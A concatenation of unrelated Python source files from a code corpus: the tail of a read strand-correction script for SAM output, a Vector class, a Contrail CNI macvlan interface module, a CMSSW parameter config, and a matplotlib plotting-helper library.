                                    elif (pairRead1.readProb() <= 1 and pairRead2.readProb() < 1) or (pairRead1.readProb() < 1 and pairRead2.readProb() <= 1): reconfirm = -1
                                    else: pass
                            if reconfirm == 0:
                                # Graded ratio thresholds, strictest first.
                                if (float(pairRead1.readRatio()) >= 0.99 and float(pairRead2.readRatio()) >= 0.5) or (float(pairRead1.readRatio()) >= 0.5 and float(pairRead2.readRatio()) >= 0.99): reconfirm = 1
                                elif (float(pairRead1.readRatio()) <= 0.01 and float(pairRead2.readRatio()) <= 0.5) or (float(pairRead1.readRatio()) <= 0.5 and float(pairRead2.readRatio()) <= 0.01): reconfirm = -1
                                else:
                                    if (float(pairRead1.readRatio()) > 0.5 and float(pairRead2.readRatio()) >= 0.5) or (float(pairRead1.readRatio()) >= 0.5 and float(pairRead2.readRatio()) > 0.5): reconfirm = 1
                                    elif (float(pairRead1.readRatio()) < 0.5 and float(pairRead2.readRatio()) <= 0.5) or (float(pairRead1.readRatio()) <= 0.5 and float(pairRead2.readRatio()) < 0.5): reconfirm = -1
                                    else:
                                        if (float(pairRead1.readRatio()) == 0.5 and float(pairRead2.readRatio()) == 0.5): pass
                                        elif float(pairRead1.readRatio()) > 0.5:
                                            if 1-float(pairRead1.readRatio()) < float(pairRead2.readRatio()): reconfirm = 1
                                            else: reconfirm = -1
                                        elif float(pairRead1.readRatio()) < 0.5:
                                            if float(pairRead1.readRatio()) < 1-float(pairRead2.readRatio()): reconfirm = -1
                                            else: reconfirm = 1
                                        else: pass
                            if reconfirm != 0:
                                if reconfirm == 1:
                                    pairRead1.setreadRatio(1,0); pairRead2.setreadRatio(1,0)
                                else: #reconfirm == -1:
                                    pairRead1.setreadRatio(0,1); pairRead2.setreadRatio(0,1)
                                npairRead1 = module.flagCorrection(pairRead1); npairRead2 = module.flagCorrection(pairRead2)
                                if not finalMappingReads_dic.has_key(p): finalMappingReads_dic[p] = []
                                finalMappingReads_dic[p].extend([npairRead1, npairRead2])
                            else: #reconfirm == 0:
                                if not remainMappingReads_dic.has_key(p): remainMappingReads_dic[p] = []
                                remainMappingReads_dic[p].extend([pairRead1, pairRead2])
            # Remove reads already handled as pairs from the singles pool.
            if len(matchpos_dic.keys()) > 0:
                matchposList = sorted(matchpos_dic.keys()); matchposList.reverse()
                if len(matchposList) == len(mediateMappingReads_dic[p]):
                    del mediateMappingReads_dic[p]
                else:
                    for matchpos in matchposList:
                        del mediateMappingReads_dic[p][matchpos]
    del npMappingReads_dic
    # Pass 3: decide the remaining single reads.
    for h in mediateMappingReads_dic.keys(): #the mate is unmapped
        for l in range(len(mediateMappingReads_dic[h])):
            singleRead = mediateMappingReads_dic[h][l]
            jpair = -1
            # If the mate is a spliced (junction) read, inherit its XS strand tag.
            if singleRead.qname() in npExonJunctionReads_dic.keys():
                for s in range(len(npExonJunctionReads_dic[singleRead.qname()])):
                    npjread = npExonJunctionReads_dic[singleRead.qname()][s]
                    if singleRead.pos() == npjread.pnext() and singleRead.pnext() == npjread.pos():
                        if 'XS:A:+' in npjread.tag(): singleRead.setreadRatio(1,0) #forward strand
                        else: singleRead.setreadRatio(0,1) #reverse strand
                        nsingleRead = module.flagCorrection(singleRead)
                        if not npExonJunctionPairs_dic.has_key(singleRead.qname()):
                            npExonJunctionPairs_dic[singleRead.qname()] = []
                        npExonJunctionPairs_dic[singleRead.qname()].append(nsingleRead)
                        jpair = 1; break
            if jpair < 0:
                # jsingle: 1 = forward, -1 = reverse, 0 = undecided.
                jsingle = 0
                if float(singleRead.readRatio()) == 1: jsingle = 1
                elif float(singleRead.readRatio()) == 0: jsingle = -1
                else:
                    if type == 'hmm':
                        if singleRead.readProb() > 1: jsingle = 1
                        elif singleRead.readProb() < 1: jsingle = -1
                        else: pass
                if jsingle == 0:
                    if float(singleRead.readRatio()) > 0.5: jsingle = 1
                    elif float(singleRead.readRatio()) < 0.5: jsingle = -1
                    else: pass
                if jsingle != 0:
                    if jsingle == 1:
                        singleRead.setreadRatio(1, 0)
                    else: #jsingle == -1:
                        singleRead.setreadRatio(0, 1)
                    nsingleRead = module.flagCorrection(singleRead)
                    if not finalMappingReads_dic.has_key(nsingleRead.qname()):
                        finalMappingReads_dic[nsingleRead.qname()] = []
                    finalMappingReads_dic[nsingleRead.qname()].append(nsingleRead)
                else: #jsingle == 0:
                    if not remainMappingReads_dic.has_key(singleRead.qname()):
                        remainMappingReads_dic[singleRead.qname()] = []
                    remainMappingReads_dic[singleRead.qname()].append(singleRead)
    del mediateMappingReads_dic
    # Write corrected ('c') and uncorrected ('u') SAM output plus a count log.
    outputFile = open(outputdir + '/logs/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + '.logs', 'w')
    coutputSam = open(outputdir + '/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + 'c.sam', 'w')
    routputSam = open(outputdir + '/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + 'u.sam', 'w')
    module.writeSamHeader(coutputSam, assembly); module.writeSamHeader(routputSam, assembly)
    correctedReadsNum = 0; uncorrectedReadsNum = 0
    for a1 in finalMappingReads_dic.keys():
        for a2 in finalMappingReads_dic[a1]:
            coutputSam.write(module.writeSam(a2) + '\n')
            correctedReadsNum += 1
    for b1 in npExonJunctionReads_dic.keys():
        for b2 in npExonJunctionReads_dic[b1]:
            coutputSam.write(module.writeSam(b2) + '\n')
            correctedReadsNum += 1
    for c1 in npExonJunctionPairs_dic.keys():
        for c2 in npExonJunctionPairs_dic[c1]:
            coutputSam.write(module.writeSam(c2) + '\n')
            correctedReadsNum += 1
    for d1 in remainMappingReads_dic.keys():
        for d2 in remainMappingReads_dic[d1]:
            routputSam.write(module.writeSam(d2) + '\n')
            uncorrectedReadsNum += 1
    outputFile.write(chr + '\t' + str(correctedReadsNum) + '\t' + str(uncorrectedReadsNum) + '\n')
    outputFile.close(); coutputSam.close(); routputSam.close()
# Run the correction for this chromosome, then convert, sort and index the BAM.
rpds(unstranded, stranded, chr)
sam.samToBam(outputdir + '/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + 'c.sam')
sam.bamSort(outputdir + '/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + 'c.bam')
sam.bamIndex(outputdir + '/' + unstranded.split('/')[-1][:-4].split('_')[0] + '_' + chr + 'c.bam')
| 2.140625 | 2 |
vector.py | progs2002/Langton-s-Ant | 4 | 12769715 | <gh_stars>1-10
class Vector:
    """A minimal 2-D vector with x and y components."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def __repr__(self):
        return "{}i, {}j".format(self.x, self.y)
def dotProduct(v1, v2):
    """Return the scalar (dot) product of two 2-D vectors."""
    xx = v1.x * v2.x
    yy = v1.y * v2.y
    return xx + yy
src/container/cni/cni/common/macvlan.py | casek14/contrail-controller | 1 | 12769716 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2016 Juniper Networks, Inc. All rights reserved.
#
"""
CNI implementation
Demultiplexes on the CNI_COMMAND and runs the necessary operation
"""
import ctypes
import errno
import inspect
import json
import os
import sys
import logging
from pyroute2 import NetlinkError, IPRoute
from interface import Interface as CniInterface
from interface import CniNamespace as CniNamespace
from cni import Error as Error
CNI_ERROR_GET_PARENT_INTF = 401
CNI_ERROR_ADD_VLAN_INTF = 402
CNI_ERROR_DEL_VLAN_INTF = 403
CNI_ERROR_ADD_MACVLAN = 404
CNI_ERROR_DEL_MACVLAN = 405
# logger for the file
logger = None
class CniMacVlan(CniInterface, object):
    '''
    Class to manage macvlan interfaces for containers.
    This is typically used in nested-k8s scenario where containers are spawned
    inside the container. The VMI for container is modeled as sub-interface in
    this case.
    The class creates a vlan-interface corresponding to the vlan in
    sub-interface and then creates a macvlan interface over it.
    '''
    def __init__(self, cni, mac, host_ifname, tag):
        # pid is used later to move interfaces between network namespaces
        self.pid = os.getpid()
        self.container_mac = mac
        self.host_ifname = host_ifname
        self.vlan_tag = tag
        self.vlan_ifname = CniMacVlan._make_vlan_intf_name(tag)
        CniInterface.__init__(self, cni)
        return

    @staticmethod
    def _make_vlan_intf_name(tag):
        # Name of the host-side vlan device for this tag, e.g. 'cn-100'.
        return 'cn-' + str(tag)

    def delete_interface(self):
        '''
        Delete the interface.
        Deletes both VLAN Tag interface and MACVlan interface
        '''
        # Find the VLAN interface interface from the MACVlan interface
        link = self.get_link()
        if link is None:
            return
        vlan_idx = None
        for i in link[0]['attrs']:
            if (i[0] == 'IFLA_LINK'):
                vlan_idx = i[1]
                break
        if vlan_idx is None:
            raise Error(CNI_ERROR_DEL_VLAN_INTF,
                        'Error finding vlan interface. Interface inside ' +
                        ' container ' + self.cni.container_ifname)
        # Delete the VLAN Tag interface.
        # It will delete the interface inside container also
        try:
            iproute = IPRoute()
            iproute.link('del', index=vlan_idx)
        except NetlinkError as e:
            # BUG FIX: vlan_tag may be an int; concatenating it directly
            # raised TypeError here and masked the real netlink error.
            raise Error(CNI_ERROR_DEL_VLAN_INTF,
                        'Error deleting VLAN interface. Parent interface ' +
                        self.host_ifname + ' vlan-tag ' + str(self.vlan_tag) +
                        ' vlan-ifindex ' + str(vlan_idx) +
                        ' code ' + str(e.code) + ' message ' + e.message)
        return

    def _locate_parent_interface(self, iproute):
        # Ensure the host parent-interface is preset in host network-namespace
        host_if = iproute.link_lookup(ifname=self.host_ifname)
        if len(host_if) == 0:
            raise Error(CNI_ERROR_GET_PARENT_INTF,
                        'Error creating parent interface ' +
                        self.host_ifname + '. Interface not found')
        return host_if[0]

    def _locate_vlan_interface(self, iproute, parent_ifindex):
        # Ensure vlan-interface is created in the host network-namespace
        vlan_if = iproute.link_lookup(ifname=self.vlan_ifname)
        # BUG FIX: was 'len(...) is not 0' — identity comparison with an int
        # literal relies on CPython small-int caching; use '!=' instead.
        if len(vlan_if) != 0:
            # vlan-interface already present
            return vlan_if[0]
        try:
            # Create vlan-interface
            iproute.link('add', ifname=self.vlan_ifname, kind='vlan',
                         vlan_id=self.vlan_tag, link=parent_ifindex)
        except NetlinkError as e:
            # EEXIST means another invocation created it concurrently: benign.
            if e.code != errno.EEXIST:
                raise Error(CNI_ERROR_ADD_VLAN_INTF,
                            'Error creating vlan interface. ' +
                            ' Parent interface ' + self.host_ifname +
                            ' vlan id ' + str(self.vlan_tag) +
                            ' vlan ifname ' + self.vlan_ifname +
                            ' code ' + str(e.code) +
                            ' message ' + e.message)
        vlan_if = iproute.link_lookup(ifname=self.vlan_ifname)
        return vlan_if[0]

    # Ensure the temporary interface is created and moved to
    # container network-namespace
    def _locate_peer_vlan_interface(self, iproute, cn_iproute, vlan_ifindex,
                                    cn_ifname):
        # Check if interface already present in container network-namespace
        cn_intf = cn_iproute.link_lookup(ifname=cn_ifname)
        # BUG FIX: was 'len(...) is not 0' (identity comparison); use '!='.
        if len(cn_intf) != 0:
            return cn_intf[0]
        # Interface not present inside container.
        # Check if it was already created in host network-namespace
        cn_intf = iproute.link_lookup(ifname=cn_ifname)
        if len(cn_intf) == 0:
            # Interface not present in host network-namespace also
            # Create interface in host-os first
            try:
                iproute.link('add', ifname=cn_ifname, kind='macvlan',
                             link=vlan_ifindex, macvlan_mode='vepa')
            except NetlinkError as e:
                if e.code != errno.EEXIST:
                    raise Error(CNI_ERROR_ADD_MACVLAN,
                                'Error creating macvlan interface ' +
                                cn_ifname +
                                ' vlan iterface ' + self.vlan_ifname +
                                ' code ' + str(e.code) +
                                ' message ' + e.message)
            cn_intf = iproute.link_lookup(ifname=cn_ifname)
        # Move the temporary interface to container network-namespace
        with CniNamespace(self.cni.container_netns):
            iproute.link('set', index=cn_intf[0], net_ns_pid=self.pid)
        return cn_intf[0]

    def _move_link(self, cn_iproute, cn_intf):
        # Rename the moved interface to the configured name inside container.
        with CniNamespace(self.cni.container_netns):
            cn_iproute.link('set', index=cn_intf,
                            ifname=self.cni.container_ifname)
        return

    def create_interface(self):
        '''
        Create MACVlan interface
        Creates VLAN interface first based on VLAN tag for sub-interface
        then create macvlan interface above the vlan interface
        '''
        # First check if interface already present inside container
        if self.get_link() is not None:
            return
        if self.vlan_tag is None:
            raise Error(CNI_ERROR_ADD_VLAN_INTF,
                        'Missing vlan-tag for macvlan interface')
        if self.host_ifname is None:
            raise Error(CNI_ERROR_ADD_VLAN_INTF,
                        'Missing parent-interface for macvlan interface')
        # Open IPRoute socket in both host and container network namespaces
        iproute = IPRoute()
        cn_iproute = None
        with CniNamespace(self.cni.container_netns):
            cn_iproute = IPRoute()
        # Locate the parent interface in host-os network-namespace
        host_ifindex = self._locate_parent_interface(iproute)
        # Locate vlan interface in host-os network-namespace
        vlan_ifindex = self._locate_vlan_interface(iproute, host_ifindex)
        # Creating interface inside container involves following steps,
        # 1. Create a macvlan interface in host network-namespace with a
        #    temporary name
        # 2. Move temporary interface inside container
        # 3. Rename temporary interface to configured name inside container
        # We must also ensure that we recover from any of the failed state
        # in earlier invocation
        # Ensure temporary interface present inside container
        cn_ifname = self.vlan_ifname + '-cn'
        cn_ifindex = self._locate_peer_vlan_interface(iproute, cn_iproute,
                                                      vlan_ifindex, cn_ifname)
        # Move temporary interface to container-ifname
        self._move_link(cn_iproute, cn_ifindex)
        return

    def configure_interface(self, ip4, plen, gw):
        # Bring the host-side vlan device up before the base class assigns
        # the address and routes inside the container.
        iproute = IPRoute()
        idx = iproute.link_lookup(ifname=self.vlan_ifname)[0]
        iproute.link('set', index=idx, state='up')
        super(CniMacVlan, self).configure_interface(ip4, plen, gw)
| 2.453125 | 2 |
L1TriggerConfig/L1TConfigProducers/python/L1TMuonEndcapParamsOnlineProxy_cfi.py | pasmuss/cmssw | 0 | 12769717 | <filename>L1TriggerConfig/L1TConfigProducers/python/L1TMuonEndcapParamsOnlineProxy_cfi.py<gh_stars>0
import FWCore.ParameterSet.Config as cms
#from L1Trigger.L1TMuonEndcap.fakeEmtfParams_cff import *
# ESProducer proxy supplying L1T endcap-muon (EMTF) parameters:
# pT-assignment LUT version, firmware version, and its deployment date.
L1TMuonEndcapParamsOnlineProxy = cms.ESProducer("L1TMuonEndcapParamsOnlineProxy",
    PtAssignVersion = cms.untracked.uint32(1),
    firmwareVersion = cms.untracked.uint32(47423),
    changeDate = cms.untracked.uint32(20161101)
)
| 1.265625 | 1 |
qharv/field/kyrt.py | Paul-St-Young/harvest_qmcpack | 2 | 12769718 | # Author: Yubo "Paul" Yang
# Email: <EMAIL>
# Kyrt is a versatile fabric exclusive to the planet Florina of Sark.
# The fluorescent and mutable kyrt is ideal for artsy decorations.
# OK, this is a library of reasonable defaults for matplotlib figures.
# May this library restore elegance to your plots.
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter
# ======================== library of defaults =========================
# expose some default colors for convenience
from matplotlib.cm import get_cmap
cmap = get_cmap('viridis')
colors = cmap.colors # 256 default colors
# Qualitative 8-color palette for categorical data.
dark8 = [ # Colors from www.ColorBrewer.org by Cynthia A. Brewer, Geography, Pennsylvania State University.
    '#1b9e77',
    '#d95f02',
    '#7570b3',
    '#e7298a',
    '#66a61e',
    '#e6ab02',
    '#a6761d',
    '#666666'
]
# Named errorbar kwargs bundles for plt.errorbar.
errorbar_style = {
    'cyq': {
        'linestyle': 'none',         # do 1 thing
        'markersize': 3.5,           # readable
        'markeredgecolor': 'black',  # accentuate
        'markeredgewidth': 0.3,
        'capsize': 4,
        'elinewidth': 0.5
    }
}
# ======================== level 0: basic color =========================
def get_cmap(name='viridis'):
    """Return the matplotlib color map registered under *name*.

    NOTE(review): shadows the get_cmap imported from matplotlib.cm at the
    top of the file (same underlying function).

    Args:
        name (str, optional): name of color map, default 'viridis'
    Return:
        matplotlib.colors.ListedColormap: requested colormap
    """
    from matplotlib import cm
    return cm.get_cmap(name)
def get_norm(vmin, vmax):
    """Return a Normalize mapping scalars in [vmin, vmax] onto [0, 1].

    Args:
        vmin (float): value minimum
        vmax (float): value maximum
    Return:
        matplotlib.colors.Normalize: color normalization function
    """
    return plt.Normalize(vmin, vmax)
def scalar_colormap(vmin, vmax, name='viridis'):
    """Build a scalar -> RGBA color function over [vmin, vmax].

    Args:
        vmin (float): minimum scalar value
        vmax (float): maximum scalar value
        name (str, optional): color map name, default is 'viridis'
    Return:
        function: float -> (float,)*4 RGBA color space
    """
    cmap = get_cmap(name)
    norm = get_norm(vmin, vmax)
    return lambda v: cmap(norm(v))
def scalar_colorbar(vmin, vmax, name='viridis', **kwargs):
    """Draw a colorbar matching scalar_colormap(vmin, vmax, name).

    Args:
        vmin (float): minimum scalar value
        vmax (float): maximum scalar value
        name (str, optional): color map name, default is 'viridis'
    Return:
        matplotlib.colorbar.Colorbar: colorbar
    """
    sm = plt.cm.ScalarMappable(norm=get_norm(vmin, vmax), cmap=get_cmap(name))
    # matplotlib issue 3644: a ScalarMappable needs an array set before
    # it can back a colorbar.
    sm.set_array([])
    return plt.colorbar(sm, **kwargs)
# ======================== level 0: basic ax edits =========================
def figaxad(labelsize=12):
    """Construct a stacked absolute/difference (ad) figure.

    The top 3/4 (axa) shows the comparison on an absolute scale; the
    bottom 1/4 (axd) shares the x axis and shows the differences.

    Args:
        labelsize (int, optional): tick label size
    Return:
        (fig, axa, axd): figure and axes for absolute and difference plots
    """
    from matplotlib.gridspec import GridSpec
    grid = GridSpec(4, 4)
    fig = plt.figure()
    axa = fig.add_subplot(grid[0:3, :])
    axd = fig.add_subplot(grid[3, :], sharex=axa)
    # Hide the top panel's x tick labels; the shared axis shows them below.
    plt.setp(axa.get_xticklabels(), visible=False)
    axa.tick_params(axis='y', labelsize=labelsize)
    axd.tick_params(labelsize=labelsize)
    fig.subplots_adjust(hspace=0)
    return fig, axa, axd
def set_xy_format(ax, xfmt='%3.2f', yfmt='%3.2f'):
    """Apply printf-style tick label formats to both axes of *ax*.

    Args:
        ax (plt.Axes): matplotlib axes
        xfmt (str, optional): xtick format, default is '%3.2f'
        yfmt (str, optional): ytick format, default is '%3.2f'
    """
    for axis, fmt in ((ax.get_xaxis(), xfmt), (ax.get_yaxis(), yfmt)):
        axis.set_major_formatter(FormatStrFormatter(fmt))
def set_tick_font(ax, xsize=14, ysize=14,
                  xweight='bold', yweight='bold', **kwargs):
    """ change x,y tick fonts
    Args:
      ax (plt.Axes): matplotlib axes
      xsize (int,optional): xtick fontsize, default is 14
      ysize (int,optional): ytick fontsize, default is 14
      xweight (str,optional): xtick fontweight, default is 'bold'
      yweight (str,optional): ytick fontweight, default is 'bold'
      kwargs (dict): other tick-related properties
    """
    # apply the same treatment to both axes, with per-axis size/weight
    for labels, size, weight in ((ax.get_xticklabels(), xsize, xweight),
                                 (ax.get_yticklabels(), ysize, yweight)):
        plt.setp(labels, fontsize=size, fontweight=weight, **kwargs)
def set_label_font(ax, xsize=14, ysize=14,
                   xweight='bold', yweight='bold', **kwargs):
    """ change x,y label fonts
    Args:
      ax (plt.Axes): matplotlib axes
      xsize (int,optional): xlabel fontsize, default is 14
      ysize (int,optional): ylabel fontsize, default is 14
      xweight (str,optional): xlabel fontweight, default is 'bold'
      yweight (str,optional): ylabel fontweight, default is 'bold'
      kwargs (dict): other label-related properties
    """
    # style both axis labels, each with its own size/weight
    for label, size, weight in ((ax.xaxis.label, xsize, xweight),
                                (ax.yaxis.label, ysize, yweight)):
        plt.setp(label, fontsize=size, fontweight=weight, **kwargs)
def xtop(ax):
    """ move xaxis label and ticks to the top
    Args:
      ax (plt.Axes): matplotlib axes
    """
    ax.get_xaxis().tick_top()
    ax.get_xaxis().set_label_position('top')
def yright(ax):
    """ move yaxis label and ticks to the right
    Args:
      ax (plt.Axes): matplotlib axes
    """
    ax.get_yaxis().tick_right()
    ax.get_yaxis().set_label_position('right')
# ======================= level 1: advanced ax edits ========================
def cox(ax, x, xtlabels):
    """Add co-xticklabels at top of the plot, e.g., with a different unit
    Args:
      ax (plt.Axes): matplotlib axes
      x (list): xtick locations
      xtlabels (list): xtick labels
    Return:
      plt.Axes: the twin axes carrying the top labels
    """
    twin = ax.twiny()
    twin.set_xlim(ax.get_xlim())
    # pin both axes to the same tick positions before relabeling the twin
    ax.set_xticks(x)
    twin.set_xticks(x)
    twin.set_xticklabels(xtlabels)
    xtop(twin)
    return twin
def coy(ax, y, ytlabels):
    """Add co-yticklabels on the right of the plot, e.g., with a different unit
    Args:
      ax (plt.Axes): matplotlib axes
      y (list): ytick locations
      ytlabels (list): ytick labels
    Return:
      plt.Axes: the twin axes carrying the right-hand labels
    """
    twin = ax.twinx()
    twin.set_ylim(ax.get_ylim())
    # pin both axes to the same tick positions before relabeling the twin
    ax.set_yticks(y)
    twin.set_yticks(y)
    twin.set_yticklabels(ytlabels)
    yright(twin)
    return twin
def align_ylim(ax1, ax2):
    """Give both axes identical y limits: the union of their current ranges.
    Args:
      ax1, ax2 (plt.Axes): axes to align
    """
    lo1, hi1 = ax1.get_ylim()
    lo2, hi2 = ax2.get_ylim()
    shared = (min(lo1, lo2), max(hi1, hi2))
    ax1.set_ylim(shared)
    ax2.set_ylim(shared)
# ====================== level 0: basic legend edits =======================
def set_legend_marker_size(leg, ms=10):
    """Set every marker drawn in the legend box to size *ms* (points).
    Args:
      leg (plt.legend.Legend): legend to modify
      ms (int, optional): marker size, default is 10
    """
    for handle in leg.legendHandles:
        # _legmarker is the private marker artist shown inside the legend
        handle._legmarker.set_markersize(ms)
def create_legend(ax, styles, labels, **kwargs):
    """ create custom legend
    learned from "Composing Custom Legends"
    Args:
      ax (plt.Axes): matplotlib axes
      styles (list): one style dict per legend entry
      labels (list): one label per legend entry
    Return:
      plt.legend.Legend: legend artist
    """
    from matplotlib.lines import Line2D
    # build empty proxy artists that carry only the requested styles
    proxies = []
    for style in styles:
        proxies.append(Line2D([], [], **style))
    return ax.legend(proxies, labels, **kwargs)
# ====================== level 0: global edits =======================
def set_style(style='ticks', context='talk', **kwargs):
    """Apply a seaborn style and context; 'talk' defaults to smaller fonts."""
    import seaborn as sns
    if context == 'talk':
        # only fill in the default when the caller didn't choose one
        kwargs.setdefault('font_scale', 0.7)
    sns.set_style(style)
    sns.set_context(context, **kwargs)
# ====================== level 0: basic Line2D edits =======================
def get_style(line):
    """ get plot styles from Line2D object
    mostly copied from "Line2D.update_from"
    Args:
      line (Line2D): source of style
    Return:
      dict: line styles readily usable for another plot
    """
    # BUG FIX: the original dict literal listed 'linestyle' twice; the
    # duplicate (which silently overwrote the first with the same value)
    # is removed.
    styles = {
        'linestyle': line.get_linestyle(),
        'linewidth': line.get_linewidth(),
        'color': line.get_color(),
        'markersize': line.get_markersize(),
        'marker': line.get_marker()
    }
    return styles
# ====================== level 0: basic Line2D =======================
def errorshade(ax, x, ym, ye, **kwargs):
    """Plot the mean curve ym and a shaded +/- ye band in the same color.
    Args:
      ax (plt.Axes): matplotlib axes
      x, ym, ye (np.array): abscissa, mean, and half-width of the band
      kwargs (dict): forwarded to ax.plot for the mean line
    Return:
      (list, PolyCollection): mean line(s) and the shaded band
    """
    line = ax.plot(x, ym, **kwargs)
    band = ax.fill_between(x, ym - ye, ym + ye,
                           color=line[0].get_color(), alpha=0.4)
    return line, band
# ===================== level 1: fit line ======================
def show_fit(ax, line, model, sel=None, nx=64, popt=None,
             xmin=None, xmax=None, circle=True, circle_style=None,
             cross=False, cross_style=None, **kwargs):
    """ fit a segment of (x, y) data and show fit
    get x, y data from line; use sel to make selection
    Args:
      ax (Axes): matplotlib axes
      line (Line2D): line with data
      model (callable): model function
      sel (np.array, optional): boolean selector array
      nx (int, optional): grid size, default 64
      popt (np.array, optional): pre-computed fit parameters; when given,
        the curve_fit step is skipped and perr is None
      xmin (float, optional): grid min
      xmax (float, optional): grid max
      circle (bool, optional): circle selected points, default True
      circle_style (dict, optional): style overrides for the circles
      cross (bool, optional): cross out deselected points, default False
      cross_style (dict, optional): style overrides for the crosses
      kwargs (dict): forwarded to ax.plot for the fit line
    Return:
      (np.array, np.array, list): (popt, perr, lines)
    """
    import numpy as np
    from scipy.optimize import curve_fit
    # get and select data to fit
    myx = line.get_xdata()
    myy = line.get_ydata()
    # show selected data
    if sel is None:
        sel = np.ones(len(myx), dtype=bool)
    myx1 = myx[sel]        # selected points: used for the fit
    myy1 = myy[sel]
    myx11 = myx[~sel]      # deselected points: optionally crossed out
    myy11 = myy[~sel]
    if xmin is None:
        xmin = myx1.min()
    if xmax is None:
        xmax = myx1.max()
    lines = []
    if circle:
        # marker-only copy of the source line's style, hollow circles
        styles = get_style(line)
        styles['linestyle'] = ''
        styles['marker'] = 'o'
        styles['fillstyle'] = 'none'
        if circle_style is not None:
            styles.update(circle_style)
        line1 = ax.plot(myx[sel], myy[sel], **styles)
        lines.append(line1[0])
    if cross:
        styles = get_style(line)
        styles['linestyle'] = ''
        styles['marker'] = 'x'
        if cross_style is not None:
            styles.update(cross_style)
        line11 = ax.plot(myx11, myy11, **styles)
        lines.append(line11[0])
    if popt is None:  # perform fit
        popt, pcov = curve_fit(model, myx1, myy1)
        perr = np.sqrt(np.diag(pcov))  # 1-sigma parameter uncertainties
    else:
        perr = None  # caller supplied popt, so no covariance is available
    # show fit on a dense grid, in the source line's color
    finex = np.linspace(xmin, xmax, nx)
    line2 = ax.plot(finex, model(finex, *popt),
                    c=line.get_color(), **kwargs)
    lines.append(line2[0])
    return popt, perr, lines
def smooth_bspline(myx, myy, nxmult=10, **spl_kws):
    """Return a smooth B-spline through (myx, myy) sampled on a denser grid.

    Args:
      myx (array-like): x data, any order (sorted internally for splrep)
      myy (array-like): y data, same length as myx
      nxmult (int, optional): output grid has len(myx)*nxmult points
      spl_kws (dict): extra keyword arguments forwarded to scipy splrep
    Return:
      (np.array, np.array): (finex, finey) dense grid and spline values
    """
    import numpy as np
    from scipy.interpolate import splrep, splev
    # accept plain lists/tuples as well as arrays
    myx = np.asarray(myx)
    myy = np.asarray(myy)
    nx = len(myx) * nxmult
    idx = np.argsort(myx)  # splrep requires strictly increasing x
    tck = splrep(myx[idx], myy[idx], **spl_kws)
    finex = np.linspace(myx.min(), myx.max(), nx)
    finey = splev(finex, tck)
    return finex, finey
def show_spline(ax, line, spl_kws=None, sel=None, **kwargs):
    """ show a smooth spline through given line x y
    Args:
      ax (plt.Axes): matplotlib axes
      line (Line2D): matplotlib line object
      spl_kws (dict, optional): keyword arguments to smooth_bspline
      sel (np.array, optional): boolean selector for the points to fit
      kwargs (dict): forwarded to ax.plot for the spline line
    Return:
      list: list holding the interpolating Line2D
    """
    import numpy as np
    # BUG FIX: the default was a mutable `dict()`; use None as the sentinel
    if spl_kws is None:
        spl_kws = {}
    myx = line.get_xdata()
    myy = line.get_ydata()
    if sel is None:
        sel = np.ones(len(myx), dtype=bool)
    myx = myx[sel]
    myy = myy[sel]
    finex, finey = smooth_bspline(myx, myy, **spl_kws)
    # draw the spline in the same color as the source line
    line1 = ax.plot(finex, finey, c=line.get_color(), **kwargs)
    return line1
def krig(finex, x0, y0, length_scale, noise_level):
    """Gaussian-process fit of (x0, y0), evaluated on the grid finex.

    Args:
      finex (np.array): 1D evaluation grid
      x0 (np.array): 1D training inputs
      y0 (np.array): training targets
      length_scale (float): RBF kernel length scale
      noise_level (float): WhiteKernel noise level
    Return:
      (np.array, np.array): posterior mean and standard deviation on finex
    """
    # FIX: import from the public package path; `sklearn.gaussian_process.gpr`
    # is a private module that was deprecated and later removed.
    from sklearn.gaussian_process import GaussianProcessRegressor
    from sklearn.gaussian_process.kernels import DotProduct, RBF
    from sklearn.gaussian_process.kernels import WhiteKernel
    # linear trend (DotProduct) + smooth wiggles (RBF) + observation noise
    kernel = DotProduct() + RBF(length_scale=length_scale)
    kernel += WhiteKernel(noise_level=noise_level)
    gpr = GaussianProcessRegressor(kernel=kernel)
    gpr.fit(x0[:, None], y0)
    ym, ye = gpr.predict(finex[:, None], return_std=True)
    return ym, ye
def gpr_errorshade(ax, x, ym, ye,
                   length_scale, noise_level, fb_kwargs=None,
                   **kwargs):
    """WARNING: length_scale and noise_level are VERY DIFFICULT to tune """
    # make errorbar plot and extract color
    if ('ls' not in kwargs) and ('linestyle' not in kwargs):
        kwargs['ls'] = ''  # default to markers only for the raw data
    line = ax.errorbar(x, ym, ye, **kwargs)
    myc = line[0].get_color()
    # smoothly fit data
    import numpy as np
    # NOTE(review): grid step comes from the first pair only -- assumes x is
    # uniformly spaced; confirm for non-uniform data
    dx = abs(x[1]-x[0])
    xmin = x.min(); xmax = x.max()
    finex = np.arange(xmin, xmax, dx/10.)
    # fit the lower and upper envelopes (mean -/+ error) separately
    ylm, yle = krig(finex, x, ym-ye,
                    length_scale=length_scale, noise_level=noise_level)
    yhm, yhe = krig(finex, x, ym+ye,
                    length_scale=length_scale, noise_level=noise_level)
    # plot fit: shade from (lower mean - lower std) to (upper mean + upper std)
    if fb_kwargs is None:
        fb_kwargs = {'color': myc, 'alpha': 0.4}
    eline = ax.fill_between(finex, ylm-yle, yhm+yhe, **fb_kwargs)
    return line[0], eline
# ===================== level 2: insets ======================
def inset_zoom(fig, ax_box, xlim, ylim, draw_func, xy_label=False):
    """ show an inset that zooms into a given part of the figure
    Args:
      fig (plt.Figure): figure
      ax_box (tuple): inset location and size (x0, y0, dx, dy) in figure ratio
      xlim (tuple): (xmin, xmax)
      ylim (tuple): (ymin, ymax)
      draw_func (callable): draw_func(ax) should recreate the figure
      xy_label (bool, optional): label inset axes, default is False
    Return:
      plt.Axes: inset axes
    Example:
      >>> ax1 = inset_zoom(fig, [0.15, 0.15, 0.3, 0.3], [0.1, 0.5], [-0.02, 0.01],
      >>>   lambda ax: ax.plot(x, y))
      >>> ax.indicate_inset_zoom(axins)
    """
    axins = fig.add_axes(ax_box)
    axins.set_xlim(*xlim)
    axins.set_ylim(*ylim)
    # re-draw the main plot's contents inside the zoomed window
    draw_func(axins)
